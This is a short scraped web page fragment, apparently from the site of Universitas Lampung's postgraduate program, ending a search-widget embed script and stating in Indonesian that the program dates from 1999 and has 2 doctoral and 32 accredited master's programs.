var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();



>>Program Pascasarjana Universitas Lampung berdiri sejak tahun 1999, Sampai sekarang Program Pascasarjana Universitas Lampung sudah mempunyai 2 Program Doktor dan 32 Program Studi Magister Terakreditasi<<